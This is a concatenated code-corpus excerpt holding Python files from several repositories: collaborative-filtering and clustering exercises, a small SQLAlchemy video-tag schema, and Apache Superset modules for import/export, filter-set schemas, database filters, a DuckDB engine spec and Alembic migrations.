fcandidates = [l for l in fcandidates if fcandidates.count(l) == 2]
fcandidates = [tuple(x) for x in set(tuple(x) for x in fcandidates)]
correlation_graph = Graph()
correlation_graph.add_edges_from(fcandidates)
fcandidates = list(find_cliques(correlation_graph))
return fcandidates
``` |
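A minimal wiring sketch for the classes above, assuming a prepared `DataSet` instance for training and testing (`train_ds`, `test_ds`) and binary target arrays (`train_target`, `test_target`); those names are placeholders and the hyperparameters are illustrative.
```python
config = NeuralNetworkConfig(batch_normalization=True)
nnet = DenseNeuralNetwork.from_scratch(config, train_ds, hidden_units=64,
                                       embedding_size=10, dropout_rate=0.2)
nnet.compile(lr=0.001)

trainer = Trainer(nnet, train_ds, train_target, batch_size=32, epochs=50)
trainer.train(verbose=0)

predictor = Predictor(nnet, test_ds)
predictor.predict()
predictor.evaluate(test_target)
print(predictor.get_score())
```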
{
"source": "7u/pci",
"score": 3
} |
#### File: pci-code/chapter2/recommendations.py
```python
critics={'<NAME>': {'Lady in the Water': 2.5, 'Snakes on a Plane': 3.5,
'Just My Luck': 3.0, 'Superman Returns': 3.5, 'You, Me and Dupree': 2.5,
'The Night Listener': 3.0},
'<NAME>': {'Lady in the Water': 3.0, 'Snakes on a Plane': 3.5,
'Just My Luck': 1.5, 'Superman Returns': 5.0, 'The Night Listener': 3.0,
'You, Me and Dupree': 3.5},
'<NAME>': {'Lady in the Water': 2.5, 'Snakes on a Plane': 3.0,
'Superman Returns': 3.5, 'The Night Listener': 4.0},
'<NAME>': {'Snakes on a Plane': 3.5, 'Just My Luck': 3.0,
'The Night Listener': 4.5, 'Superman Returns': 4.0,
'You, Me and Dupree': 2.5},
'<NAME>': {'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
'Just My Luck': 2.0, 'Superman Returns': 3.0, 'The Night Listener': 3.0,
'You, Me and Dupree': 2.0},
'<NAME>': {'Lady in the Water': 3.0, 'Snakes on a Plane': 4.0,
'The Night Listener': 3.0, 'Superman Returns': 5.0, 'You, Me and Dupree': 3.5},
'Toby': {'Snakes on a Plane':4.5,'You, Me and Dupree':1.0,'Superman Returns':4.0}}
from math import sqrt
# Returns a distance-based similarity score for person1 and person2
def sim_distance(prefs,person1,person2):
sum=0
for item,score in prefs[person1].items():
if item in prefs[person2]:
sum=sum+pow(score-prefs[person2][item],2)
if sum == 0:
return sum;
return 1/(1+sqrt(sum))
# Returns the Pearson correlation coefficient for p1 and p2
def sim_pearson(prefs,person1,person2):
si={}
for item in prefs[person1]:
if item in prefs[person2]:
si[item]=1
n=len(si)
if n == 0:
return 0
sum1=sum([prefs[person1][item] for item in si])
sum2=sum([prefs[person2][item] for item in si])
sqSum1=sum([pow(prefs[person1][item],2) for item in si])
sqSum2=sum([pow(prefs[person2][item],2) for item in si])
pSum=sum([prefs[person1][item]*prefs[person2][item] for item in si])
indp=sqrt((sqSum1-pow(sum1,2)/n)*(sqSum2-pow(sum2,2)/n))
if indp == 0:
return 0
cov=pSum-sum1*sum2/n
return cov/indp
# Returns the best matches for person from the prefs dictionary.
# Number of results and similarity function are optional params.
def topMatches(prefs,person,similarity=sim_distance,n=5):
scores=[(similarity(prefs,person,other),other) for other in prefs if person != other]
scores.sort()
scores.reverse()
return scores[0:n]
# Gets recommendations for a person by using a weighted average
# of every other user's rankings
def getRecommendations(prefs,person,similarity=sim_pearson):
totals={}
simSum={}
for other,rankings in prefs.items():
if other != person:
sim=similarity(prefs,person,other)
if sim < 0:
continue
for it,score in rankings.items():
if it not in prefs[person] or prefs[person][it] == 0:
totals.setdefault(it, 0)
totals[it] += sim * score
simSum.setdefault(it, 0)
simSum[it] += sim
recommendations=[(score/simSum[it],it) for it,score in totals.items()]
recommendations.sort()
recommendations.reverse()
return recommendations
def transformPrefs(prefs):
result={}
for user in prefs:
for item in prefs[user]:
result.setdefault(item,{})
result[item][user]=prefs[user][item]
return result
def calculateSimilarItems(prefs,n=10):
result={}
items=transformPrefs(prefs)
c=0
for it in items:
c+=1
if c%100==0: print "%d / %d" % (c,len(items))
result[it]=topMatches(items,it,sim_distance,n)
return result
def getRecommendedItems(prefs,itemMatch,user):
totals={}
simSum={}
for it,score in prefs[user].items():
for (sim,other) in itemMatch[it]:
if other not in prefs[user] or prefs[user][other] == 0:
totals.setdefault(other, 0)
totals[other] += sim * score
simSum.setdefault(other, 0)
simSum[other] += sim
recommendations=[(score/simSum[it],it) for it,score in totals.items()]
recommendations.sort()
recommendations.reverse()
return recommendations
#def loadMovieLens(path='/data/movielens'):
```
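A short usage sketch against the `critics` data defined at the top of the file (Python 2 print syntax, matching the rest of the chapter code):
```python
print topMatches(critics, 'Toby', similarity=sim_pearson, n=3)
print getRecommendations(critics, 'Toby')
print getRecommendations(transformPrefs(critics), 'Superman Returns')
```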
#### File: pci-code/chapter3/clusters.py
```python
def readfile(filename):
lines=[line for line in file(filename)]
# First line is the column titles
colnames=lines[0].strip().split('\t')[1:]
rownames=[]
data=[]
for line in lines[1:]:
p=line.strip().split('\t')
# First column in each row is the rowname
rownames.append(p[0])
# The data for this row is the remainder of the row
data.append([float(x) for x in p[1:]])
return rownames,colnames,data
from math import sqrt
def pearson(v1,v2):
sum1=sum(v1)
sum2=sum(v2)
sqSum1=sum([pow(v,2) for v in v1])
sqSum2=sum([pow(v,2) for v in v2])
n=len(v1)
pSum=sum([v1[i]*v2[i] for i in range(n)])
indp=sqrt((sqSum1-pow(sum1,2)/n)*(sqSum2-pow(sum2,2)/n))
if indp == 0:
return 0
cov=pSum-sum1*sum2/n
return 1-cov/indp
class biCluster:
def __init__(self,vec,left=None,right=None,distance=0.0,id=None):
self.vec=vec
self.left=left
self.right=right
self.distance=distance
self.id=id
def hcluster(rows,distance=pearson):
distances={}
currentClustId=-1
cluster=[biCluster(rows[i],id=i) for i in range(len(rows))]
while len(cluster) > 1:
lowestPair=(0,1)
closest=distance(cluster[0].vec,cluster[1].vec)
for i in range(len(cluster)):
for j in range(i+1,len(cluster)):
if (cluster[i].id,cluster[j].id) not in distances:
distances[(cluster[i].id,cluster[j].id)]=distance(cluster[i].vec,cluster[j].vec)
d=distances[(cluster[i].id,cluster[j].id)]
if d < closest:
closest=d
lowestPair=(i,j)
mergeVec=[(cluster[lowestPair[0]].vec[i]+cluster[lowestPair[1]].vec[i])/2 for i in range(len(rows[0]))]
newCluster=biCluster(mergeVec,cluster[lowestPair[0]],cluster[lowestPair[1]],closest,currentClustId)
currentClustId-=1
del cluster[lowestPair[1]]
del cluster[lowestPair[0]]
cluster.append(newCluster)
return cluster[0]
def printclust(clust,labels=None,n=0):
# indent to make a hierarchy layout
for i in range(n): print ' ',
if clust.id<0:
# negative id means that this is branch
print '-'
else:
# positive id means that this is an endpoint
if labels==None: print clust.id
else: print labels[clust.id]
# now print the right and left branches
if clust.left!=None: printclust(clust.left,labels=labels,n=n+1)
if clust.right!=None: printclust(clust.right,labels=labels,n=n+1)
#def getheight(clust):
#def getdepth(clust):
#def drawdendrogram(clust,labels,jpeg='clusters.jpg'):
#def drawnode(draw,clust,x,y,scaling,labels):
def rotateMatrix(data):
newData=[]
for i in range(len(data[0])):
newRow=[data[j][i] for j in range(len(data))]
newData.append(newRow)
return newData
#import random
#def kcluster(rows,distance=pearson,k=4):
#def tanamoto(v1,v2):
#def scaledown(data,distance=pearson,rate=0.01):
#def draw2d(data,labels,jpeg='mds2d.jpg'):
```
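A tiny hand-made example for the clustering helpers above (Python 2 print syntax; the row values and labels are arbitrary):
```python
rows = [[1.0, 2.0, 3.0], [1.1, 2.1, 3.1], [9.0, 8.0, 7.0]]
tree = hcluster(rows)
printclust(tree, labels=['blog_a', 'blog_b', 'blog_c'])
```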
#### File: pci-code/chapter7/zillow.py
```python
import xml.dom.minidom
import urllib2
zwskey='<KEY>'
def getaddressdata(address,city):
escad=address.replace(' ','+')
# Construct the URL
url='http://www.zillow.com/webservice/GetDeepSearchResults.htm?'
    url+='zws-id=%s&address=%s&citystatezip=%s' % (zwskey,escad,city)
# Parse resulting XML
``` |
{
"source": "7venheavens/henpy",
"score": 3
} |
#### File: henpy/persist/tables.py
```python
from sqlalchemy import Column, ForeignKey, Integer, String, Date, Table
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
Base = declarative_base()
# Association table for the many-to-many video-tag relation
video_tag = Table("video_tag", Base.metadata,
Column("video_id", Integer, ForeignKey("video.id")),
Column("tag_id", Integer, ForeignKey("tag.id")),)
class Tag(Base):
"""
@attrs
id
name
data
"""
__tablename__ = "tag"
id = Column(Integer, primary_key=True)
name = Column(String(255), nullable=False)
data = relationship("TagData")
videos = relationship(
"Video",
secondary=video_tag,
back_populates="tags")
class TagData(Base):
"""Language specific tag data
@attrs
id
tag
language
name
display_name
"""
__tablename__ = "tag_data"
id = Column(Integer, primary_key=True)
tag_id = Column(Integer, ForeignKey("tag.id"))
type = Column(String(255))
language = Column(String(20), nullable=False)
name = Column(String(255), nullable=False, index=True)
display_name = Column(String(255), nullable=False)
class Video(Base):
__tablename__ = "video"
id = Column(Integer, primary_key=True)
code = Column(String(50), nullable=False, index=True)
release_date = Column(Date, index=True)
image_path = Column(String(255), nullable=True) # Images are optional
director = Column(String(100), nullable=False)
maker = Column(String(100), nullable=False)
label = Column(String(100), nullable=False)
tags = relationship(
"Tag",
secondary=video_tag,
back_populates="videos")
def __repr__(self):
return self.__str__()
def __str__(self):
return f"<VideoMetadata:code={self.code}>"
class VideoData(Base):
"""Video data containing language requirements
"""
__tablename__ = "video_data"
id = Column(Integer, primary_key=True)
title = Column(String(100), nullable=False)
language = Column(String(20), nullable=False)
``` |
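A quick schema check, sketched against an in-memory SQLite database; the field values are placeholders and only exercise the models defined above.
```python
from sqlalchemy.orm import sessionmaker

engine = create_engine("sqlite:///:memory:")
Base.metadata.create_all(engine)
session = sessionmaker(bind=engine)()

tag = Tag(name="example-tag")
video = Video(code="ABC-123", director="unknown", maker="unknown", label="unknown")
video.tags.append(tag)
session.add(video)
session.commit()
print(session.query(Video).first())  # <VideoMetadata:code=ABC-123>
```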
{
"source": "7vikpeculiar/superset",
"score": 2
} |
#### File: importers/v1/__init__.py
```python
from typing import Any, Dict, List, Optional, Set
from marshmallow import Schema, validate
from marshmallow.exceptions import ValidationError
from sqlalchemy.orm import Session
from superset import db
from superset.commands.base import BaseCommand
from superset.commands.exceptions import CommandException, CommandInvalidError
from superset.commands.importers.v1.utils import (
load_configs,
load_metadata,
load_yaml,
METADATA_FILE_NAME,
validate_metadata_type,
)
from superset.dao.base import BaseDAO
from superset.models.core import Database
class ImportModelsCommand(BaseCommand):
"""Import models"""
dao = BaseDAO
model_name = "model"
prefix = ""
schemas: Dict[str, Schema] = {}
import_error = CommandException
# pylint: disable=unused-argument
def __init__(self, contents: Dict[str, str], *args: Any, **kwargs: Any):
self.contents = contents
self.passwords: Dict[str, str] = kwargs.get("passwords") or {}
self.overwrite: bool = kwargs.get("overwrite", False)
self._configs: Dict[str, Any] = {}
@staticmethod
def _import(
session: Session, configs: Dict[str, Any], overwrite: bool = False
) -> None:
raise NotImplementedError("Subclasses MUST implement _import")
@classmethod
def _get_uuids(cls) -> Set[str]:
return {str(model.uuid) for model in db.session.query(cls.dao.model_cls).all()}
def run(self) -> None:
self.validate()
# rollback to prevent partial imports
try:
self._import(db.session, self._configs, self.overwrite)
db.session.commit()
except Exception as ex:
db.session.rollback()
raise self.import_error() from ex
def validate(self) -> None:
exceptions: List[ValidationError] = []
# verify that the metadata file is present and valid
try:
metadata: Optional[Dict[str, str]] = load_metadata(self.contents)
except ValidationError as exc:
exceptions.append(exc)
metadata = None
if self.dao.model_cls:
validate_metadata_type(metadata, self.dao.model_cls.__name__, exceptions)
# load the configs and make sure we have confirmation to overwrite existing models
self._configs = load_configs(
self.contents, self.schemas, self.passwords, exceptions
)
self._prevent_overwrite_existing_model(exceptions)
if exceptions:
exception = CommandInvalidError(f"Error importing {self.model_name}")
exception.add_list(exceptions)
raise exception
def _prevent_overwrite_existing_model( # pylint: disable=invalid-name
self, exceptions: List[ValidationError]
) -> None:
"""check if the object exists and shouldn't be overwritten"""
if not self.overwrite:
existing_uuids = self._get_uuids()
for file_name, config in self._configs.items():
if (
file_name.startswith(self.prefix)
and config["uuid"] in existing_uuids
):
exceptions.append(
ValidationError(
{
file_name: (
f"{self.model_name.title()} already exists "
"and `overwrite=true` was not passed"
),
}
)
)
```
#### File: dashboards/commands/export.py
```python
import json
import logging
import random
import string
from typing import Any, Dict, Iterator, Optional, Set, Tuple
import yaml
from werkzeug.utils import secure_filename
from superset.charts.commands.export import ExportChartsCommand
from superset.dashboards.commands.exceptions import DashboardNotFoundError
from superset.dashboards.commands.importers.v1.utils import find_chart_uuids
from superset.dashboards.dao import DashboardDAO
from superset.commands.export.models import ExportModelsCommand
from superset.datasets.commands.export import ExportDatasetsCommand
from superset.datasets.dao import DatasetDAO
from superset.models.dashboard import Dashboard
from superset.models.slice import Slice
from superset.utils.dict_import_export import EXPORT_VERSION
logger = logging.getLogger(__name__)
# keys stored as JSON are loaded and the prefix/suffix removed
JSON_KEYS = {"position_json": "position", "json_metadata": "metadata"}
DEFAULT_CHART_HEIGHT = 50
DEFAULT_CHART_WIDTH = 4
def suffix(length: int = 8) -> str:
return "".join(
random.SystemRandom().choice(string.ascii_uppercase + string.digits)
for _ in range(length)
)
def get_default_position(title: str) -> Dict[str, Any]:
return {
"DASHBOARD_VERSION_KEY": "v2",
"ROOT_ID": {"children": ["GRID_ID"], "id": "ROOT_ID", "type": "ROOT"},
"GRID_ID": {
"children": [],
"id": "GRID_ID",
"parents": ["ROOT_ID"],
"type": "GRID",
},
"HEADER_ID": {"id": "HEADER_ID", "meta": {"text": title}, "type": "HEADER"},
}
def append_charts(position: Dict[str, Any], charts: Set[Slice]) -> Dict[str, Any]:
chart_hashes = [f"CHART-{suffix()}" for _ in charts]
# if we have ROOT_ID/GRID_ID, append orphan charts to a new row inside the grid
row_hash = None
if "ROOT_ID" in position and "GRID_ID" in position["ROOT_ID"]["children"]:
row_hash = f"ROW-N-{suffix()}"
position["GRID_ID"]["children"].append(row_hash)
position[row_hash] = {
"children": chart_hashes,
"id": row_hash,
"meta": {"0": "ROOT_ID", "background": "BACKGROUND_TRANSPARENT"},
"type": "ROW",
"parents": ["ROOT_ID", "GRID_ID"],
}
for chart_hash, chart in zip(chart_hashes, charts):
position[chart_hash] = {
"children": [],
"id": chart_hash,
"meta": {
"chartId": chart.id,
"height": DEFAULT_CHART_HEIGHT,
"sliceName": chart.slice_name,
"uuid": str(chart.uuid),
"width": DEFAULT_CHART_WIDTH,
},
"type": "CHART",
}
if row_hash:
position[chart_hash]["parents"] = ["ROOT_ID", "GRID_ID", row_hash]
return position
class ExportDashboardsCommand(ExportModelsCommand):
dao = DashboardDAO
not_found = DashboardNotFoundError
# pylint: disable=too-many-locals
@staticmethod
def _export(
model: Dashboard, export_related: bool = True
) -> Iterator[Tuple[str, str]]:
dashboard_slug = secure_filename(model.dashboard_title)
file_name = f"dashboards/{dashboard_slug}.yaml"
payload = model.export_to_dict(
recursive=False,
include_parent_ref=False,
include_defaults=True,
export_uuids=True,
)
# TODO (betodealmeida): move this logic to export_to_dict once this
# becomes the default export endpoint
for key, new_name in JSON_KEYS.items():
value: Optional[str] = payload.pop(key, None)
if value:
try:
payload[new_name] = json.loads(value)
except (TypeError, json.decoder.JSONDecodeError):
logger.info("Unable to decode `%s` field: %s", key, value)
payload[new_name] = {}
# Extract all native filter datasets and replace native
# filter dataset references with uuid
for native_filter in payload.get("metadata", {}).get(
"native_filter_configuration", []
):
for target in native_filter.get("targets", []):
dataset_id = target.pop("datasetId", None)
if dataset_id is not None:
dataset = DatasetDAO.find_by_id(dataset_id)
if dataset:
target["datasetUuid"] = str(dataset.uuid)
if export_related:
yield from ExportDatasetsCommand([dataset_id]).run()
# the mapping between dashboard -> charts is inferred from the position
# attribute, so if it's not present we need to add a default config
if not payload.get("position"):
payload["position"] = get_default_position(model.dashboard_title)
        # if any charts are not referenced in position, we need to add them
# in a new row
referenced_charts = find_chart_uuids(payload["position"])
orphan_charts = {
chart for chart in model.slices if str(chart.uuid) not in referenced_charts
}
if orphan_charts:
payload["position"] = append_charts(payload["position"], orphan_charts)
payload["version"] = EXPORT_VERSION
file_content = yaml.safe_dump(payload, sort_keys=False)
yield file_name, file_content
if export_related:
chart_ids = [chart.id for chart in model.slices]
yield from ExportChartsCommand(chart_ids).run()
```
#### File: dashboards/filter_sets/schemas.py
```python
from typing import Any, cast, Dict, Mapping
from marshmallow import fields, post_load, Schema, ValidationError
from marshmallow.validate import Length, OneOf
from superset.dashboards.filter_sets.consts import (
DASHBOARD_OWNER_TYPE,
JSON_METADATA_FIELD,
OWNER_ID_FIELD,
OWNER_TYPE_FIELD,
USER_OWNER_TYPE,
)
class JsonMetadataSchema(Schema):
nativeFilters = fields.Mapping(required=True, allow_none=False)
dataMask = fields.Mapping(required=False, allow_none=False)
class FilterSetSchema(Schema):
json_metadata_schema: JsonMetadataSchema = JsonMetadataSchema()
def _validate_json_meta_data(self, json_meta_data: str) -> None:
try:
self.json_metadata_schema.loads(json_meta_data)
except Exception as ex:
raise ValidationError("failed to parse json_metadata to json") from ex
class FilterSetPostSchema(FilterSetSchema):
json_metadata_schema: JsonMetadataSchema = JsonMetadataSchema()
# pylint: disable=W0613
name = fields.String(
required=True,
allow_none=False,
validate=Length(0, 500),
)
description = fields.String(
required=False, allow_none=True, validate=[Length(1, 1000)]
)
json_metadata = fields.String(allow_none=False, required=True)
owner_type = fields.String(
required=True, validate=OneOf([USER_OWNER_TYPE, DASHBOARD_OWNER_TYPE])
)
owner_id = fields.Int(required=False)
@post_load
def validate(
self, data: Mapping[Any, Any], *, many: Any, partial: Any
) -> Dict[str, Any]:
self._validate_json_meta_data(data[JSON_METADATA_FIELD])
if data[OWNER_TYPE_FIELD] == USER_OWNER_TYPE and OWNER_ID_FIELD not in data:
raise ValidationError("owner_id is mandatory when owner_type is User")
return cast(Dict[str, Any], data)
class FilterSetPutSchema(FilterSetSchema):
name = fields.String(required=False, allow_none=False, validate=Length(0, 500))
description = fields.String(
required=False, allow_none=False, validate=[Length(1, 1000)]
)
json_metadata = fields.String(required=False, allow_none=False)
owner_type = fields.String(
allow_none=False, required=False, validate=OneOf([DASHBOARD_OWNER_TYPE])
)
@post_load
def validate( # pylint: disable=unused-argument
self, data: Mapping[Any, Any], *, many: Any, partial: Any
) -> Dict[str, Any]:
if JSON_METADATA_FIELD in data:
self._validate_json_meta_data(data[JSON_METADATA_FIELD])
return cast(Dict[str, Any], data)
def validate_pair(first_field: str, second_field: str, data: Dict[str, Any]) -> None:
if first_field in data and second_field not in data:
raise ValidationError(
"{} must be included alongside {}".format(first_field, second_field)
)
```
#### File: superset/databases/filters.py
```python
from typing import Any, Set
from flask import g
from flask_babel import lazy_gettext as _
from sqlalchemy import or_
from sqlalchemy.orm import Query
from sqlalchemy.sql.expression import cast
from sqlalchemy.sql.sqltypes import JSON
from superset import app, security_manager
from superset.models.core import Database
from superset.views.base import BaseFilter
def can_access_databases(
view_menu_name: str,
) -> Set[str]:
return {
security_manager.unpack_database_and_schema(vm).database
for vm in security_manager.user_view_menu_names(view_menu_name)
}
class DatabaseFilter(BaseFilter): # pylint: disable=too-few-public-methods
# TODO(bogdan): consider caching.
def apply(self, query: Query, value: Any) -> Query:
if security_manager.can_access_all_databases():
return query
database_perms = security_manager.user_view_menu_names("database_access")
schema_access_databases = can_access_databases("schema_access")
datasource_access_databases = can_access_databases("datasource_access")
return query.filter(
or_(
self.model.perm.in_(database_perms),
self.model.database_name.in_(
[*schema_access_databases, *datasource_access_databases]
),
)
)
class DatabaseUploadEnabledFilter(BaseFilter): # pylint: disable=too-few-public-methods
"""
Custom filter for the GET list that filters all databases based on allow_file_upload
"""
name = _("Upload Enabled")
arg_name = "upload_is_enabled"
def apply(self, query: Query, value: Any) -> Query:
filtered_query = query.filter(Database.allow_file_upload)
datasource_access_databases = can_access_databases("datasource_access")
if hasattr(g, "user"):
allowed_schemas = [
app.config["ALLOWED_USER_CSV_SCHEMA_FUNC"](db, g.user)
for db in datasource_access_databases
]
if len(allowed_schemas):
return filtered_query
        return filtered_query.filter(
            or_(
                cast(Database.extra, JSON)["schemas_allowed_for_file_upload"].isnot(None),
                cast(Database.extra, JSON)["schemas_allowed_for_file_upload"] != [],
            )
        )
```
#### File: superset/db_engine_specs/duckdb.py
```python
from __future__ import annotations
import re
from datetime import datetime
from typing import Any, Dict, List, Optional, Pattern, Tuple, TYPE_CHECKING
from flask_babel import gettext as __
from sqlalchemy.engine.reflection import Inspector
from superset.db_engine_specs.base import BaseEngineSpec
from superset.errors import SupersetErrorType
from superset.utils import core as utils
if TYPE_CHECKING:
# prevent circular imports
from superset.models.core import Database
COLUMN_DOES_NOT_EXIST_REGEX = re.compile("no such column: (?P<column_name>.+)")
class DuckDBEngineSpec(BaseEngineSpec):
engine = "duckdb"
engine_name = "DuckDB"
_time_grain_expressions = {
None: "{col}",
"PT1S": "DATE_TRUNC('second', {col})",
"PT1M": "DATE_TRUNC('minute', {col})",
"PT1H": "DATE_TRUNC('hour', {col})",
"P1D": "DATE_TRUNC('day', {col})",
"P1W": "DATE_TRUNC('week', {col})",
"P1M": "DATE_TRUNC('month', {col})",
"P0.25Y": "DATE_TRUNC('quarter', {col})",
"P1Y": "DATE_TRUNC('year', {col})",
}
custom_errors: Dict[Pattern[str], Tuple[str, SupersetErrorType, Dict[str, Any]]] = {
COLUMN_DOES_NOT_EXIST_REGEX: (
__('We can\'t seem to resolve the column "%(column_name)s"'),
SupersetErrorType.COLUMN_DOES_NOT_EXIST_ERROR,
{},
),
}
@classmethod
def epoch_to_dttm(cls) -> str:
return "datetime({col}, 'unixepoch')"
@classmethod
def convert_dttm(
cls, target_type: str, dttm: datetime, db_extra: Optional[Dict[str, Any]] = None
) -> Optional[str]:
tt = target_type.upper()
if tt in (utils.TemporalType.TEXT, utils.TemporalType.DATETIME):
return f"""'{dttm.isoformat(sep=" ", timespec="microseconds")}'"""
return None
@classmethod
def get_table_names(
cls, database: Database, inspector: Inspector, schema: Optional[str]
) -> List[str]:
"""Need to disregard the schema for DuckDB"""
return sorted(inspector.get_table_names())
```
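For illustration, the `_time_grain_expressions` templates above expand with simple string formatting; this sketch bypasses Superset's normal call path and just formats one entry directly, with a made-up column name.
```python
expr = DuckDBEngineSpec._time_grain_expressions["P1D"].format(col="order_ts")
print(expr)  # DATE_TRUNC('day', order_ts)
```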
#### File: migrations/shared/utils.py
```python
import logging
import os
import time
from typing import Any
from uuid import uuid4
from alembic import op
from sqlalchemy import engine_from_config
from sqlalchemy.dialects.mysql.base import MySQLDialect
from sqlalchemy.dialects.postgresql.base import PGDialect
from sqlalchemy.engine import reflection
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.orm import Session
logger = logging.getLogger(__name__)
DEFAULT_BATCH_SIZE = int(os.environ.get("BATCH_SIZE", 1000))
def table_has_column(table: str, column: str) -> bool:
"""
Checks if a column exists in a given table.
:param table: A table name
:param column: A column name
:returns: True iff the column exists in the table
"""
config = op.get_context().config
engine = engine_from_config(
config.get_section(config.config_ini_section), prefix="sqlalchemy."
)
insp = reflection.Inspector.from_engine(engine)
try:
return any(col["name"] == column for col in insp.get_columns(table))
except NoSuchTableError:
return False
uuid_by_dialect = {
MySQLDialect: "UNHEX(REPLACE(CONVERT(UUID() using utf8mb4), '-', ''))",
PGDialect: "uuid_in(md5(random()::text || clock_timestamp()::text)::cstring)",
}
def assign_uuids(
model: Any, session: Session, batch_size: int = DEFAULT_BATCH_SIZE
) -> None:
"""Generate new UUIDs for all rows in a table"""
bind = op.get_bind()
table_name = model.__tablename__
count = session.query(model).count()
# silently skip if the table is empty (suitable for db initialization)
if count == 0:
return
start_time = time.time()
print(f"\nAdding uuids for `{table_name}`...")
# Use dialect specific native SQL queries if possible
for dialect, sql in uuid_by_dialect.items():
if isinstance(bind.dialect, dialect):
op.execute(
f"UPDATE {dialect().identifier_preparer.quote(table_name)} SET uuid = {sql}"
)
print(f"Done. Assigned {count} uuids in {time.time() - start_time:.3f}s.\n")
return
    # Otherwise use the Python uuid function
start = 0
while start < count:
end = min(start + batch_size, count)
for obj in session.query(model)[start:end]:
obj.uuid = uuid4()
session.merge(obj)
session.commit()
if start + batch_size < count:
print(f" uuid assigned to {end} out of {count}\r", end="")
start += batch_size
print(f"Done. Assigned {count} uuids in {time.time() - start_time:.3f}s.\n")
```
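The Python fallback at the end of `assign_uuids` walks the table in fixed-size slices. The standalone sketch below reproduces that batching loop over a plain list instead of a SQLAlchemy session, so it runs without a database; the record class and batch size are illustrative only.
```python
import time
from uuid import uuid4

class Record:
    """Stand-in for an ORM row that needs a uuid."""
    def __init__(self) -> None:
        self.uuid = None

records = [Record() for _ in range(25)]  # pretend table contents
batch_size = 10
count = len(records)

start_time = time.time()
start = 0
while start < count:
    end = min(start + batch_size, count)
    for obj in records[start:end]:  # session.query(model)[start:end] in the original
        obj.uuid = uuid4()
    # session.commit() would run here once per batch
    start += batch_size

assert all(r.uuid is not None for r in records)
print(f"Assigned {count} uuids in {time.time() - start_time:.3f}s")
```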
#### File: migrations/versions/3ba29ecbaac5_change_datatype_of_type_in_basecolumn.py
```python
revision = "<KEY>"
down_revision = "abe27eaf<PASSWORD>"
import sqlalchemy as sa
from alembic import op
def upgrade():
with op.batch_alter_table("table_columns") as batch_op:
batch_op.alter_column(
"type", existing_type=sa.VARCHAR(length=32), type_=sa.TEXT()
)
def downgrade():
with op.batch_alter_table("table_columns") as batch_op:
batch_op.alter_column(
"type", existing_type=sa.TEXT(), type_=sa.VARCHAR(length=32)
)
```
#### File: migrations/versions/8b841273bec3_sql_lab_models_database_constraint_updates.py
```python
revision = "8b841273bec3"
down_revision = "2<PASSWORD>"
import sqlalchemy as sa
from alembic import op
from superset.utils.core import generic_find_fk_constraint_name
def upgrade():
bind = op.get_bind()
insp = sa.engine.reflection.Inspector.from_engine(bind)
with op.batch_alter_table("tab_state") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"client_id"}, "query", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"tab_state_database_id_fkey",
"dbs",
["database_id"],
["id"],
ondelete="CASCADE",
)
batch_op.create_foreign_key(
"tab_state_latest_query_id_fkey",
"query",
["latest_query_id"],
["client_id"],
ondelete="SET NULL",
)
with op.batch_alter_table("table_schema") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"table_schema", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"table_schema_database_id_fkey",
"dbs",
["database_id"],
["id"],
ondelete="CASCADE",
)
def downgrade():
bind = op.get_bind()
insp = sa.engine.reflection.Inspector.from_engine(bind)
with op.batch_alter_table("tab_state") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
table_schema_id_constraint = generic_find_fk_constraint_name(
"tab_state", {"client_id"}, "query", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"tab_state_database_id_fkey", "dbs", ["database_id"], ["id"]
)
batch_op.create_foreign_key(
"tab_state_latest_query_id_fkey",
"query",
["latest_query_id"],
["client_id"],
)
with op.batch_alter_table("table_schema") as batch_op:
table_schema_id_constraint = generic_find_fk_constraint_name(
"table_schema", {"id"}, "dbs", insp
)
if table_schema_id_constraint:
batch_op.drop_constraint(
table_schema_id_constraint,
type_="foreignkey",
)
batch_op.create_foreign_key(
"table_schema_database_id_fkey", "dbs", ["database_id"], ["id"]
)
```
#### File: superset/models/embedded_dashboard.py
```python
import uuid
from typing import List
from flask_appbuilder import Model
from sqlalchemy import Column, ForeignKey, Integer, Text
from sqlalchemy.orm import relationship
from sqlalchemy_utils import UUIDType
from superset.models.helpers import AuditMixinNullable
class EmbeddedDashboard(Model, AuditMixinNullable):
"""
A configuration of embedding for a dashboard.
Currently, the only embeddable resource is the Dashboard.
If we add new embeddable resource types, this model should probably be renamed.
References the dashboard, and contains a config for embedding that dashboard.
This data model allows multiple configurations for a given dashboard,
but at this time the API only allows setting one.
"""
__tablename__ = "embedded_dashboards"
uuid = Column(UUIDType(binary=True), default=uuid.uuid4, primary_key=True)
allow_domain_list = Column(Text) # reference the `allowed_domains` property instead
dashboard_id = Column(Integer, ForeignKey("dashboards.id"), nullable=False)
dashboard = relationship(
"Dashboard",
back_populates="embedded",
foreign_keys=[dashboard_id],
)
@property
def allowed_domains(self) -> List[str]:
"""
A list of domains which are allowed to embed the dashboard.
An empty list means any domain can embed.
"""
return self.allow_domain_list.split(",") if self.allow_domain_list else []
```
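`allowed_domains` is just a comma-split over the stored text column, with an empty value meaning "any domain". A standalone check of that parsing rule (domain values are invented):
```python
from typing import List, Optional

def allowed_domains(allow_domain_list: Optional[str]) -> List[str]:
    """Same rule as EmbeddedDashboard.allowed_domains."""
    return allow_domain_list.split(",") if allow_domain_list else []

print(allowed_domains("example.com,dashboards.example.org"))
# ['example.com', 'dashboards.example.org']
print(allowed_domains(None))  # [] -> any domain may embed
print(allowed_domains(""))    # [] -> any domain may embed
```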
#### File: reports/commands/base.py
```python
import logging
from typing import Any, Dict, List
